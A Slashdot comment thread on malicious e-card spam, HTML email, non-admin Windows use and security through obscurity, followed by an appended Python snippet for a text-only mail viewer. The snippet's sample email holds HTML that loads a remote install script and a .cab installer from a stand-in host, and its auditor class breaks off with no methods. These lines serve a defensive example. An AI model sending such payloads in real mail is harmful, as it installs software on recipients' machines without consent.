      I have finally stopped feeling sorry for the lusers that won't listen to advice on how not to get burned. It used to be that folks who got viruses, had their computer dial expensive phone numbers, had disgusting pictures display on their screen could claim that the Internet is all new to them and they could claim ignorance. Things have changed, if people don't know by now that the Internet is a dangerous place and how to protect themselves, then they are just plain stupid. Some people blame the bad guys and Microsoft for people doing really stupid things on the Internet, the problem is with lusers that don't listen when they are told how to prevent this shit. Maybe a license isn't such a bad idea.

  38. How Turn off HTML in Mozilla e-mail client? by Anonymous Coward · · Score: 0

    I can't find a way.

    1. Re:How Turn off HTML in Mozilla e-mail client? by ortholattice · · Score: 2, Informative
      I can't find a way.

      View -> Message Body As -> Plain Text

    2. Re:How Turn off HTML in Mozilla e-mail client? by Anonymous Coward · · Score: 0
      View -> Message Body As -> Plain Text

      Well, that certainly is easier than editing the registry like you need to do for IE: http://support.microsoft.com/default.aspx?scid=kb;EN-US;307594

      And the nice thing is that it's right on the main menu, so you don't have to change your prefs for the odd page you really do want to view in HTML.

  39. Re:Redundant, I know. Don't run as Administrator. by ExistentialFeline · · Score: 1

    Unfortunately, Windows isn't precisely the same because it's very easy in Linux to set user permissions and much more of a pain in the butt in Windows (if it's even possible in some cases.)

  40. If you use Outlook for your mail.. by JasonUCF · · Score: 5, Informative
    You need SpamBayes. The beautiful folks behind it have included an Outlook plugin. Now you can knock your bayesian filter self out with a self contained easily run end-client solution. In smaller words, no need for anything fancy from your ISP, just install, plug, and play. In the few days I have used it my spam has literally dropped to 0. Spams are nailed before I even see them show up in the INBOX (it's that fast).

    Go check it out. It's really, really, good, and free, as in, well, um, beer?

    I have spent too many hours building elaborate rule sets, banning Class A IP's, keyword filters, etcetera. The spam still gets through and it carries nasty payload half the time. Bayesian...bayesian... bayesian...

    1. Re:If you use Outlook for your mail.. by pileated · · Score: 1

      I completely agree. My spam has gone to 0-1%. The vast majority of it is correctly placed in Junk-Email or Junk-Suspects folders by SpamBayes.

      And it does force some responsibility on the user in terms of setting it up. That's what makes it work so well.

      Of course if you work at a place where people have nothing better to do than open e-cards then no filtering, outside of paycheck deductions, will have much effect.

  41. I got one yesterday by swb · · Score: 3, Interesting

    Was the e-card itself (as viewed at the web site 123greetings.com) a problem, or was it the message itself the problem?

    I get those stupid e-cards from relatives occasionally, and I never open the messages in anything but pine because they're usually loaded with crap I don't want to run.

    In this case, I viewed the email in pine, copied the ecard number and viewed the stupid thing on the web site, presuming it would be from my brother (an AOL lifer), since it was my anniversary. It was unattributed on the site, so I figured it was just a spam/traffic generator.

    1. Re:I got one yesterday by BiggerIsBetter · · Score: 1

      I got one too. It said it was *from* me, to some chick I've never known in my life. Someone's desperate for clicks...

      --
      Forget thrust, drag, lift and weight. Airplanes fly because of money.
  42. "Sparky" does this on clients' Enterprises. by gfecyk · · Score: 2, Interesting

    > Tell you what sparky -- YOU try that across
    > an enterprise type installation.

    Done. Twice.

    I'm an IT consultant, a professional. I practice what I preach and I test things. I bounce applications that don't work with MY security standards. And I'm paid well for it.

    I've massaged very broken applications into a secured environment. I'm talking about really broken, designed-for-16-bit-windows applications. I've never worked with recent versions of AutoCAD but, after at least ten years of developing for 32-bit Windows, and with Win2K being four years old, Autodesk has no excuse.

    --
    Use Evolution instead of Outlook? Bewa
    1. Re:"Sparky" does this on clients' Enterprises. by pavera · · Score: 1

      There are lots of things in windows that require admin access, MS office 97 requires it, AutoCAD does as well, you can't fix these problems without a source license, if you install them, users must have admin rights on their machines to run them.

  43. overwrites wmplayer.exe?? by p4ul13 · · Score: 4, Funny

    Well ok; so it's not ALL bad then.

    --
    Paul Lenhart writes words!
    1. Re:overwrites wmplayer.exe?? by cavac · · Score: 1

      Could be better. It could change the registry so it is the ONLY program started on windows startup (make especially sense on NT, 2K and XP where it would also disable the login script and therefore all that nasty desktop thingy that prohibits many users from getting their REAL work done anyway :-)

      --
      Look, this thing is totally safe! Built it myself, you know. You just press that button like this and then turn that lev
  44. Re:e-cards by Anonymous Coward · · Score: 3, Informative

    How do e-card services make money?
    The less moral ones sell the email addresses they harvest from every ecard- both sender and destination.

    To prove this, get 2 fresh email addresses. send an ecard from one to the other. Watch the spam roll in.

  45. Re:e-cards by ggvaidya · · Score: 1
    yeah, and it's one of those "little things" you can do for someone, isn't it? Just a post to say you care, that sort of thing.

    Nothing beats a real card, but while I can't remember most of the real cards I've got (though I've got em in a drawer somewhere) I sure can remember a lot of the e-cards, particularly those sent by friends when I was feeling down or something. Gotta love the internet! =)

  46. Replace the software or replace the vendor. by gfecyk · · Score: 2, Informative

    CD burners: Roxio EasyCD Creator 5 and later work as regular users.

    Scanners: I know HP doesn't support some older scanners under Win2K. Later HP ones, especially USB based ones, work fine as a regular user. The combo printer/scanners I've seen work fine as a regular user.

    Programs that require Admin: That's why we have competition. I've massaged some badly behaving apps into working as a regular user - it's not hard to loosen up the minimums an app "needs". It's even easier to go to their competition (Quickbooks vs Simply Accounting: One works as a regular user, one requires "power user." Which one did I recommend?)

    As for the plain "zipped-idiot.exe" e-mail? That's what Outlook 2000 and later are for: "Outlook has blocked access to the following attachments: this-is-a-bomb.exe/scr/bat/com/etc"

    --
    Use Evolution instead of Outlook? Bewa
    1. Re:Replace the software or replace the vendor. by Silburn_Luke · · Score: 1
      Programs that require Admin: That's why we have competition. I've massaged some badly behaving apps into working as a regular user - it's not hard to loosen up the minimums an app "needs".
      I've run into this with some netgear Wifi kit recently, the scanning client seems to assume Admin privileges for correct function under WinXP.

      I'm not actively chasing this down at present because I've got a bunch of other techie chores to do at home before I go back to getting WiFi to work (including mothballing the XP install in favour of Linux so it might be a moot point). Needless to say I will *not* be happy with WiFi s/ware that won't run under (in XP parlance) a restricted user. We shall see.

      Regards Luke

      --
      #include witty_one_liner.h
    2. Re:Replace the software or replace the vendor. by Anonymous Coward · · Score: 0

      If you're going to have to replace most of your application software and half your peripherals to run as a regular user, wouldn't it be easier to just replace your operating system? At least that way you get to keep your peripherals.

    3. Re:Replace the software or replace the vendor. by Anonymous Coward · · Score: 0

      Because then you'd keep Microsoft apologists like him out of work.

    4. Re:Replace the software or replace the vendor. by rogabean · · Score: 1

      start quote: "As for the plain "zipped-idiot.exe" e-mail? That's what Outlook 2000 and later are for: "Outlook has blocked access to the following attachments: this-is-a-bomb.exe/scr/bat/com/etc" :end quote

      I hate to say it, but that feature doesn't cut it to stopping that. Sure by default OE 2000 and later block access to attachments, but most end users simply turn access to it back on.

      You would not believe how many users a day call me asking why every time they try and open the attachment their friends/coworkers/family send them it gives them this message and I end up having to tell em how to turn off the blocking feature.
      (work for a broadband ISP)

      So I hate to say it, but most home end users will still open up "zipped-idiot-run-this-file-and-give-me-my-backdoor-to-your-system.exe"

      --
      "why don't you just slip into something more comfortable...like a coma!"
  47. Launching Files by ticklemeozmo · · Score: 2, Insightful

    Actually, at one point in time (DotCom boom maybe?, remember "Active Desktop", the whole point of "portals") the browser was SUPPOSED to do anything and everything. Your browser was supposed to be your desktop and that's how you'd do stuff.

    That was the point of a "home page", you could get your news and start up Word all on the same page.

    --
    When modding "Informative", please make sure it both has a source and IS actually informative.
    1. Re:Launching Files by zero_offset · · Score: 1

      Yeah, Netscape and Sun both jumped on that bandwagon for a short time.
      (Shhh! They're not The Great Satan!)

      --

      Slashdot quality declines as the number of hot grits posts decreases. - Provolt's Law, Apr-09-2005

  48. Virus vs. Spam by the+grace+of+R'hllor · · Score: 5, Interesting

    Because Viruses can do better with some effort.

    MSBlaster is still going around. My own average from installing a base WinXP (and forgetting the Blaster fix and other updates) is about two minutes to being infected with the Blaster worm. A friend's personal best was when he was plugging his laptop into the university's network for a bit. After sixteen (16) seconds, his machine had blaster installed and got the RPC to reboot!

    E-mail just can't beat those times.

    1. Re:Virus vs. Spam by ameoba · · Score: 1

      Worms are not viruses, nor are they 'worm-viruses'. They are worms. We have different names for these things 'cuz they are different.

      --
      my sig's at the bottom of the page.
    2. Re:Virus vs. Spam by the+grace+of+R'hllor · · Score: 1

      Worms are just a delivery platform, just as E-mailed screensavers can be.

  49. E-cards are EVIL by rqqrtnb · · Score: 5, Insightful
    Why do people still insist on using e-cards?

    They are spam harvesters. Nothing more.

    I go to great lengths to avoid having my email reach spammer lists. But it only takes one person to screw that email address by submitting it to an e-card spammer.

    Do I need to attach a note to my emails?

    If you are thinking of sending me an e-card:
    • I will be changing my email address again, much to the chagrin of everyone else.

    • Since you have proved incapable of not providing spammers with my personal email address, you will NOT be receiving the new one.

    • You are now limited to traditional (non 21st Century) forms of communication with me.

    What possesses people to do it?

    Are they too busy to write me something personal? Do they feel they cannot express their greeting in words? Do they not understand how to attach images? Maybe they actually hate me...

    Bastards.

    1. Re:E-cards are EVIL by cybergrue · · Score: 4, Insightful

      Why do people still insist on using e-cards?
      What possesses people to do it?

      Because they think that it is exactly the same as sending you a physical card, just updated for the 21st century. They have absolutely no idea that there can be a down-side to these things because they are thinking of it in terms of a physical card. They are probably thinking that since you use a computer a lot, then you will like to see a greeting card on your computer. I know, I have a lot of relatives that have done this in the past, and it took a lot of explaining to them why this was a really bad idea.

    2. Re:E-cards are EVIL by Anonymous Coward · · Score: 1, Funny

      What's your email address?

  50. Just say NO to [prescription] drugs!!! by Thud457 · · Score: 0, Offtopic

    Goddamn bitch whacked out on Zoloft robbed the world of Troy McClure and the incomparable Lionel Hutz.

    --

    the preceding comment is my own and in no way reflects the opinion of the Joint Chiefs of Staff

  51. the sky is falling! by Carty · · Score: 1, Interesting

    "which is a rather clear analysis of a piece of malicious spam"

    I appreciate his effort but I don't see what's particularly clear about:

    'I don't have a windows machine, and don't particularly want to run this and the other executable on one. If someone wants to investigate, feel free.'

    One thing that *is* clear is that Windows machines that have installed the most recent patches from MS are not vulnerable. Is it really necessary to abandon IE?

    I am no MS apologist but I did not learn anything meaningful from this ...

  52. Suggest an alternative browser whenever possible by ktulu1115 · · Score: 1

    Well, I'm known (to pretty much all that know me) as the computer dude... Either as the weird Linux nerd, the odd-geek who loves assembly, or just the usual gamer. Having such a reputation automatically makes the non-technically savvy expect me to fix their computers for them, and I've been doing so for many years. This is a perfect opportunity (I'd recommend the same to anyone else in my situation)

    After some consideration, I think I'm going to be installing Firefox on everyone's PCs from now on (with their approval of course). A simple blurb about how insecure IE is, the ease of virus-catching (almost sounds like IE has HIV, doesn't it?), and a few key-points from IE's past and I think most of the "normal" PC users will be a quick convert. The fact it doesn't crash (least not for me) will do nothing but help as well - most of them bitch about that too. :-d

    --
    # fuser -v /dev/attention | grep work
    #
  53. My spam with full header database by leoaugust · · Score: 4, Informative

    .
    I have been putting my spam with full headers here, and hope that people investigating can use the info in the headers like IP addresses, gateways, aliases etc. As it is cached in Google, the results should show up for specific keywords.

    If you are spam hunters, please be my guest and fry some spammers a***

    .

    --
    To see a world in a grain of sand, and then to step back and see the beach where the sand lies ...
  54. Oh boy... by mog007 · · Score: 3, Funny

    I've got a /. rss feed through a Trillian plug-in, and my window was sized just right to make the title of the article:
    "Malicious E-Cards" - An anal...

    I thought goatse was coming back... in the form of email.

    *Shudder*

  55. But why shouldn't they just work? by physicsnerd · · Score: 1
    But why shouldn't people expect their computers to just work? You expect your car to just work and it's on the same level of complexity that a computer is. People who have been running PCs for a few years are so used to windows and the insecurities that running windows brings that they don't expect their computers to just work.

    Not everyone is an expert at being a sys admin nor should they have to be. Going back to the car analogy, we don't expect everyone who drives to be a mechanic. We need to stop just accepting that windows sucks and demand that Microsoft start dealing with these issues or switch to something that actually works. Let's face it, 90% of the population doesn't need windows.

    I ran windows for a long time. Started on x86 hardware using MS-DOS 3.something. I finally gave up after windows XP came out. Each version of windows is just slower and more bloated than the last. I tried linux for a couple of months, but it just wasn't my cup of tea for my desktop. But even linux just works. Once it was up and running I never had any issues with it.

    Last year I sat down in front of an OSX box. A week or so later I bought my first Mac ever, a powerbook. This is by far the best computer that I've ever owned. I've had it for just over a year now and I haven't had a single problem with it. The only thing I did was upgrade it to 10.3 from 10.2 and that went perfectly. I have never had to deal with malicious email. Every new virus that goes around I don't catch. I don't have any driver problems. Everything on my computer just works.

    To sum up this rant, if we can't expect windows to just work then why in the hell should we use it?

    1. Re:But why shouldn't they just work? by Zeriel · · Score: 1

      Your car analogy is flawed--the average driver has to go through a minimum of a driver's ed. course in high school, pass a written test, practice with an experienced driver for a length of time (varies by state), take a test from a state employee, and be licensed.

      THEN we still don't trust them for a while (higher insurance rates ages 16-25, higher insurance rates until you have three accident-free years with a car (at least from my company)).

      Using a computer requires you to sit down and turn it on. No licenses, no training, no tests. I no more expect Joe Average to be able to use a computer error-free than I'd expect a completely untrained 16-yr-old to drive well.

      --
      "America has done some terrible things. But I know that Americans don't cheer when innocents die." -Dave Barry
    2. Re:But why shouldn't they just work? by jnicholson · · Score: 1
      Your car analogy is flawed--the average driver has to go through a minimum of a driver's ed. course in high school, pass a written test, practice with an experienced driver for a length of time (varies by state), take a test from a state employee, and be licensed.
      You forgot taking it to a mechanic every 6-12 months to have an overhaul. And simply changing the oil from time to time.
      And I would argue that a car is a more simple device than a computer, if only because it has a specific task and is not general-purpose.
      --
      "Do not drill any holes in your cat - it will not like it."
      -- Nick Davies
  56. Not everyone is an artist or a writer by pixelfreak · · Score: 1

    "Are they too busy to write me something personal? Do they feel they cannot express their greeting in words? Do they not understand how to attach images? "

    Not everyone is an artist or a writer, which is why traditional cards exist. Unfortunately, most E-Cards are crap.

    The only E-Cards I use are from Hallmark and Apple. They seem to limit the amount of crap they send me in return for the content and bandwidth required to provide the service.

  57. Security through obscurity DOES work by Kombat · · Score: 3, Insightful

    Security through obscurity never works

    Hogwash. There are plenty of examples where "Security through obscurity" works just fine. Take, for example, Timothy McVeigh's execution. It took place in Indiana, but due to the large number of victims' families who wished to view the execution in Oklahoma, and who couldn't travel, the execution was broadcast via a closed-circuit satellite link to a gymnasium in Oklahoma. There was an extremely strong demand for the general public to tap into that feed. Hackers everywhere could have made an enormous name for themselves if they'd been able to intercept and decrypt that signal. But, since neither the specifics of the transmission of the signal, nor the encryption method used were ever made public, no one captured the signal, and a search for "Timothy McVeigh Execution" on Kazaa returns 0 results. Security through obscurity worked in this example.

    Here's another example. Do you have any idea about the internal layout of the Pentagon? Of course not. The floor plans are top secret. The locations of secret escape hallways are all top secret. The knowledge is "obscured." And consequently, the Pentagon has never been physically broken into. If all you naive "openness is more secure" zealots had your way, then the entire schematic of the Pentagon, White House, NORAD, and everything else would be all over the net, for us "White hats" to scrutinize and improve. Unfortunately, we'd all argue over what the "right" way to do things would be, and meanwhile, bin Laden's disciples would be delivering suicide-bomb-after-suicide-bomb to Bush's bedside.

    I admit that "Security through obscurity" is not a silver bullet, and in many cases, is less desirable than open approaches. However, it is obvious that neither is your suggestion that open solutions are always best, correct. It should be clear to even the most fervent zealot that sometimes, a layer of obscurity is appropriate, and enhances the security of a situation that has already been thoroughly scrutinized by a variety of experts.

    --
    Like woodworking? Build your own picture frames.
    1. Re:Security through obscurity DOES work by kisrael · · Score: 1

      Just to totally miss your point...
      This is what I wrote re: the McVeigh execution:

      Salon article: Judge rules no webcast of McVeigh's execution. Now I'm against the death penalty. But if you're going to go for it, you should really go for it. Don't try to pretend there's some kind of dignity here. Go full tilt for the bread and circuses. If the people demand revenge in cold blood, give it to them! In full color! And Dolby Stereo! On national tv! Really get that "deterrence" message out there!

      --
      SO YOU'RE GOING TO DIE: The Comic for Dealing with Death
    2. Re:Security through obscurity DOES work by Sgt+York · · Score: 3, Interesting
      Well, security through obscurity works, but only when the obscurity is at or very near 100%. In the Pentagon, no one is allowed to see the layout, and only certain people are allowed to interact with any part of it. The McVeigh execution was the same way, no one got to see any details of it. IIRC, the exact time/date wasn't even announced until the last minute.

      However, in software you can't have that near 100% obscurity because large numbers of people have to use the software. Take the Pentagon example. If it was necessary for a very large number of people to have somewhat limited access to the building on a continual basis, the security would eventually break down. The floor plan would eventually be at least partially elucidated and this could allow further security breaches, leading to the discovery of more of the floor plan, etc.

      The whole point of making software (like this) is so that lots of people will use it routinely. This high volume, routine use does eventually lead to a breach in the security of the software.

      I agree that the flat, absolute statement "security through obscurity never works" is incorrect. However, that pure obscurity is exceptionally rare, almost to the point of nonexistence in the software world.

      --

      There is a reason for everything. Sometimes that reason just sucks.

    3. Re:Security through obscurity DOES work by jfengel · · Score: 1

      I didn't mean to imply that open-source is any sort of silver bullet, or even that it's better. My preferences actually run towards redesigning programming languages for additional security. I trust Firebird not because it's open source but because it's more recent, and because I simply find it more pleasant to use than IE.

      You are right that security through obscurity can work. And it can work for a long time. I'm sure the office network I run is terribly vulnerable, but nobody's ever made a concerted effort because there's nothing valuable here. Worse, the software that I write is terribly vulnerable, but it would cost four times as much to make it less vulnerable. It's never been attacked, not because it's hard to get in but simply because you've never heard of it.

      But security-through-obscurity won't withstand a long-term concerted attack. The McVeigh execution was a one-time event. If they had broadcasts of every execution, I'm sure they would find a way if obscurity were their only mechanism.

      And I _do_ know the layout of many parts of the Pentagon. I've worked there, and so have tens of thousands of other people. The detailed layout isn't considered a secret, exactly; at least, nobody told me that it was.

    4. Re:Security through obscurity DOES work by Anonymous Coward · · Score: 0

      Do you have any idea about the internal layout of the Pentagon? Of course not. The floor plans are top secret. The locations of secret escape hallways are all top secret. The knowledge is "obscured." And consequently, the Pentagon has never been physically broken into.

      If the Pentagon has ever been physically broken into, I doubt it would be public knowledge.

      But for the sake of discussion, let's assume it hasn't. I suspect that would have more to do with the company-or-so of armed guards policing the facility, along with (I would guess) badge and biometric access points.

      On the other hand, one could argue that the facility was "broken into" on September 11th. And the 'zealots' responsible didn't exactly need floor plans.

    5. Re:Security through obscurity DOES work by Anonymous Coward · · Score: 0
      Clearly you've never dealt with serious crackers. Not everyone out there is a script kiddie.

      The original poster was correct: security through obscurity never works. Perhaps he should've added "against a determined attack".

    6. Re:Security through obscurity DOES work by Spoing · · Score: 1
        1. Security through obscurity never works

        Hogwash.

      There is a difference between secrets and security through obscurity.

      Example: Passwords are secrets. The mechanism to validate those passwords should never be muddled in obscurity since that leads to back doors and other problems.

      Now, adding obscurity to the mix on top of verifiable and unobscured methods is not a bad idea. The "security through obscurity" gripe is really against "security through obscure methods only or trusting someone else's assurance that they are doing the right thing".

      Shortening it to "security through obscurity does not work" is shorthand.

      --
      A firewall can not protect you from yourself. Turn off what you do not need. Do not use the firewall to do your work.
    7. Re:Security through obscurity DOES work by Spoing · · Score: 1
      1. I'm sure the office network I run is terribly vulnerable, but nobody's ever made a concerted effort because there's nothing valuable here.

      Just because it's not 'valuable' doesn't mean it isn't a target. Computing resources alone have value, as does simple voyeurism. That doesn't even approach intentional abuses of the accounting records. As a rule, assume everything is a target even if there is no obvious reason why it would be.

      --
      A firewall can not protect you from yourself. Turn off what you do not need. Do not use the firewall to do your work.
    8. Re:Security through obscurity DOES work by jfengel · · Score: 1

      Sure it could be a target. Obscurity is what keeps it from being a target. Now that I've talked about it on Slashdot I'm probably going to be hosed. /quickly checks web site

      Well, not yet.

    9. Re:Security through obscurity DOES work by Spoing · · Score: 1
      1. Sure it could be a target. Obscurity is what keeps it from being a target.

      [ horrified ] If it's a web site -- on the Internet or (to a lesser degree) an intranet -- there's no way that obscurity is any bit of protection. Secrets, such as passwords, can be helpful, though obscurity itself is wishing nothing goes wrong, not insurance against problems.

      At a bare minimum, run Nessus or one of the other top-notch scanners from both the intranet and Internet and see what it finds; www.nessus.org

      --
      A firewall can not protect you from yourself. Turn off what you do not need. Do not use the firewall to do your work.
    10. Re:Security through obscurity DOES work by orkysoft · · Score: 1

      Yes, I'm sure the builders of the Pentagon were buried in its basements after their tongues got cut out.

      --

      I suffer from attention surplus disorder.
    11. Re:Security through obscurity DOES work by jfengel · · Score: 1

      I've got to learn to write complete answers when I speak on Slashdot.

      My website is outsourced. I trust real professionals to keep it safe; I'm not an expert in web site security. I see the attacks in the logs, and I observe that they don't get through. Somebody reading my Slashdot posting and deciding to put me in my place is going to hit my web server, not the office network that I manage.

      My office network is behind a firewall, but I'm not a security expert. There are plenty of ways through that firewall, I'm sure, but I keep it locked down pretty tight. (No, I'm not going to be talking about the details on Slashdot.)

      It's probably been attacked thousands of times at random, but the firewall keeps it out. Because I haven't been the victim of a DOS attack, I don't even really notice the attacks. I'd sure notice a DOS attack, but since there are literally millions of networks like this one, I'm just one more face in the crowd.

      So I don't rely on obscurity solely, but thus far the obscurity has meant I've avoided concerted attacks, which would probably be more effective than the rather desultory ones I've seen so far. My server ignores Code Red; my non-Windows firewall keeps out worms. I do my best, but the best security I personally have had against concerted attack is the fact that nobody really cares.

      (Funny that I should end up defending obscurity. I actually started this thread with the blanket statement "obscurity doesn't work.")

    12. Re:Security through obscurity DOES work by shlashdot · · Score: 1

      http://www.dtic.mil/jcs/j6/sponsor/pentroom.htm ok so it's missing the secret tunnels.

      --
      Additional plugins are required to display all the media on this page.
    13. Re:Security through obscurity DOES work by Spoing · · Score: 1

      OK. If you have a chance, try out Nessus. The analysis it provides is close to normal English; sentences and paragraphs of warnings with some raw data, not raw data all by itself.

      --
      A firewall can not protect you from yourself. Turn off what you do not need. Do not use the firewall to do your work.
    14. Re:Security through obscurity DOES work by Anonymous Coward · · Score: 0

      No, but they would be if they discussed the layout publicly.

    15. Re:Security through obscurity DOES work by jfengel · · Score: 1

      Will do. Thanks for the suggestion.

    16. Re:Security through obscurity DOES work by zero_offset · · Score: 1
      Take the Pentagon example. If it was necessary for a very large number of people to have somewhat limited access to the building on a continual basis

      You've obviously never been there. THOUSANDS of people work there, and hundreds, possibly thousands more visit the building daily on various pieces of business. Once you're inside, there really isn't anything to keep you from wandering around pretty much at will. When I was a kid, I went there with my father all the time.

      Of course, that fact probably refutes the grandparent post far better than your statement does...

      --

      Slashdot quality declines as the number of hot grits posts decreases. - Provolt's Law, Apr-09-2005

  58. Re:e-cards by Brandon30X · · Score: 2, Informative

    I always send them to myself, to an address that already gets TONS of spam. Then I simply forward the card to whoever, and let them know I sent it to myself to respect their e-mail privacy.

    Which brings up a good question. Would anyone be offended or mad at someone who sent you an ecard to an e-mail address you keep clean of spam?

    --
    Quitters never win, Winners never quit, But those who never win and never quit are idiots.
  59. The Complete Solution: by Anonymous Coward · · Score: 0

    lynx

    1. Re:The Complete Solution: by cavac · · Score: 1

      Yeah, sure. Lynx is secure. Proven by this and this and this pages. NOT!

      --
      Look, this thing is totally safe! Built it myself, you know. You just press that button like this and then turn that lev
  60. OR by diablobynight · · Score: 4, Interesting

    You could just simply not view messages from people you don't know. This would solve the majority of problems. I mean if I don't know you, I don't read mail from you, I mean there are times when I take the chance, but let's face it, how often do random people email your personal account? And if you're talking a webmaster or sales account, then yes, turn off html, or have your IT guy set up your securities properly.

    --
    Anonymous Cowards - Oh God, How I hate you
    1. Re:OR by RetroGeek · · Score: 5, Insightful

      You could just simply not view messages from people you don't know.

      Otherwise known as a white list.

      Yes, these work, but part of the utility of the email system is that you CAN get messages from unknown people. I read your email address at some interesting site (slashdot?) and I want to have a one2one conversation with you. So I send you an email. You don't know me from anyone, yet we can have a discussion about something without the entire world being privy to it.

      And this is the real bad effect that SPAM has created. We no longer trust strangers.

      Sigh...

      --

      - - - - - - - - - - -
      I am a programmer. I am paid to produce syntax not grammar. Deal with it.
    2. Re:OR by diablobynight · · Score: 2, Interesting

      did you not read, I sometimes do read unknown email, meaning, I personally filter it, I don't use a refuse all unknown white list. And if I saw, the subject said, In response to Slashdot, or something else that I was aware I was posting to, or investigating, then I read it with HTML turned off, but if it's from my buddies I read it with HTML on, if it's from my mom or any girl for that matter, I turn HTML off. lol know your email sender, and adjust accordingly.

      --
      Anonymous Cowards - Oh God, How I hate you
    3. Re:OR by Anonymous Coward · · Score: 1, Informative

      Yes, that works fine until your friend gets an email virus and sends an infected mail to you.

    4. Re:OR by CreatureComfort · · Score: 1

      Unfortunately it's my mom and girlfriend who are the worst about sending me HTML formatted email. I have tried over and over again to explain to them why this is bad, and how lousy their emails sent to me look while I have HTML turned off, but they "Think it looks cute" to have a purple fairy for the background image behind bold pink text.

      And obviously if Incredimail's advertising says it's "safe, fun, and cool", and CNet gives it a #1 software, and ZDNet and Tucows both go gaga over it, then it must be great, and it's me that's broken.

      --
      "Unheard of means only it's undreamed of yet,
      Impossible means not yet done." ~~ Julia Ecklar
    5. Re:OR by Endive4Ever · · Score: 0, Flamebait

      if it's from my mom or any girl for that matter, I turn HTML off.

      Not a problem for you often, I take it.

      News flash: you won't get cooties from reading email from a 'girl.'

      --
      ---
    6. Re:OR by misleb · · Score: 2, Insightful
      You could just simply not view messages from people you don't know. This would solve the majority of problems. I mean if I don't know you, I don't read mail from you, I mean there are times when I take the chance, but let's face it, how often do random people email your personal account?

      I get the occasional email from strangers or people I don't normally communicate with via email. For instance, someone from Usenet or a mailing list might email me. I'd hate to miss any one of those. I think it is reasonable to tell people not to open strange attachments, but it isn't reasonable to suggest that people don't even open an email from a stranger. That is just paranoid and unnecessary with reasonable measures taken. Turning off the stupid HTML "feature," don't open strange attachments, run a Bayesian SPAM filter, and everything should be just fine.

      -matthew

      --
      "THERE IS NO JUSTICE, THERE IS ONLY ME." -Death
    7. Re:OR by misleb · · Score: 1
      did you not read, I sometimes do read unknown email, meaning, I personally filter it, I don't use a refuse all unknown white list. And if I saw, the subject said, In response to Slashdot, or something else that I was aware I was posting to, or investigating, then I read it with HTML turned off, but if it's from my buddies I read it with HTML on, if it's from my mom or any girl for that matter, I turn HTML off. lol know your email sender, and adjust accordingly.

      All that just to avoid getting a virus or malicious HTML? What an awkward way to use email.

      --
      "THERE IS NO JUSTICE, THERE IS ONLY ME." -Death
    8. Re:OR by Spoing · · Score: 2
      1. And obviously if Incredimail's advertising says it's "safe, fun, and cool", and CNet gives it a #1 software, and ZDNet and Tucows both go gaga over it, then it must be great, and it's me that's broken.

      Tell them it looks like *rap on your end -- send them a quoted example that does not render -- and that you never view HTML because of security concerns. Faking addresses is too common now, so it's not them, it's the spammers.

      My father used to do the same thing, but after a few reminders he asked how to change it. The next time I visited -- click click -- it was disabled. He hasn't complained since...though he's not in the 'purple fairy background and bold pink text' crowd. Show them how ugly it is, and they might be convinced (OK, not likely, though let them know you don't see what they see).

      --
      A firewall can not protect you from yourself. Turn off what you do not need. Do not use the firewall to do your work.
    9. Re:OR by RetroGeek · · Score: 1

      you won't get cooties from reading email from a 'girl.'

      I read this as "you won't get cookies from a girl." Then I thought, what email program sets cookies?

      --

      - - - - - - - - - - -
      I am a programmer. I am paid to produce syntax not grammar. Deal with it.
    10. Re:OR by RetroGeek · · Score: 1

      did you not read, I sometimes do read unknown email, meaning, I personally filter it

      Hmmm, that does not come through in the original msg. Now that you have explained it though.....

      --

      - - - - - - - - - - -
      I am a programmer. I am paid to produce syntax not grammar. Deal with it.
    11. Re:OR by diablobynight · · Score: 1

      I love the personal insult that I don't get email from girls, oh yes love god of the ages you're of course correct, us nerds never see women.

      actually I was just making a point that girls are the worst offenders for sending me emails, with viruses, flash screens, stupid little pop ups, bongo buddies, and other shit.

      --
      Anonymous Cowards - Oh God, How I hate you
    12. Re:OR by diablobynight · · Score: 1

      not really, usually with questionable email, I just read it through my webmail which doesn't allow html. and everything else I read through outlook. The majority of my email is from work, or people I trust, the rest of it, some friends of mine, and the occasional unknown person, I just pop out to webmail.

      --
      Anonymous Cowards - Oh God, How I hate you
    13. Re:OR by diablobynight · · Score: 1

      I can't get email viruses through my email, unless they are newer than my email scanner on the server end knows about. I set up the work email server and have it scan all incoming and outgoing mail for viruses, if it finds a virus, it tries to cure and if that is impossible it strips the attachment. No muss no fuss, but these html attacks aren't really viruses and can still get through, but not through my spam guard which stops I'd say about 80% of spam on the server end.

      --
      Anonymous Cowards - Oh God, How I hate you
    14. Re:OR by misleb · · Score: 1
      Sorry, but that *is* awkward. Just turn off HTML and/or don't run Outlook and you won't have to jump through hoops like that. Bottom line is that you shouldn't have to fear opening an email... no matter who it is from. Hell, I don't even have to worry about clicking on attachments. Sometimes I really pity you Windows/Outlook users.

      Yeah, I'm smug. Sue me.

      matthew

      --
      "THERE IS NO JUSTICE, THERE IS ONLY ME." -Death
    15. Re:OR by Reziac · · Score: 3, Insightful

      There's also the little minor issue that even people on your whitelist can unknowingly send you malicious email.

      Realworld example: My sister (who, *if* I used a whitelist, would naturally be on it) added some downloaded toolbar to her browser, which in turn reformatted her email as it was being sent (she never saw the alterations)... and what I got in my mailbox was HTML formatted, with javascript that tried to fetch and install the same spyware toolbar (but was foiled by my braindead mail client).

      And other folks on private mailing lists I'm on (which would also be whitelisted) have also unknowingly sent virus attachments. This happened on a mailing list populated by sysadmins, not exactly "regular users who don't know anything".

      Crap, now I gotta go find another story to spend my mod points on :)

      --
      ~REZ~ #43301. Who'd fake being me anyway?
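
An added example, not part of any comment in this thread and not any real mail client's code: a minimal text-only viewer in the spirit of the "HTML turned off" advice and the "braindead mail client" anecdote above. It displays only the text/plain part and reports what the HTML part would have tried to run or fetch; the sample message, addresses and hostnames are constructed.

```python
import email
from email import policy
from html.parser import HTMLParser

# Constructed sample: a multipart/alternative mail whose HTML part
# carries active content (all names and hosts are made up).
SAMPLE = """\
From: sister@example.org
To: me@example.org
Subject: Happy birthday!
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="b1"

--b1
Content-Type: text/plain; charset="utf-8"

Happy birthday! See you Sunday.
--b1
Content-Type: text/html; charset="utf-8"

<html><body onload="init()">
<p>Happy <b>birthday</b>! See you Sunday.</p>
<script src="http://toolbar.example.invalid/install.js"></script>
<object classid="clsid:00000000-0000-0000-0000-000000000000"
        codebase="http://toolbar.example.invalid/tb.cab"></object>
<img src="http://tracker.example.invalid/open.gif?id=123">
</body></html>
--b1--
"""


class ActiveContentAuditor(HTMLParser):
    """Walks an HTML body without rendering it and records anything that
    would execute code or fetch a remote resource when displayed."""

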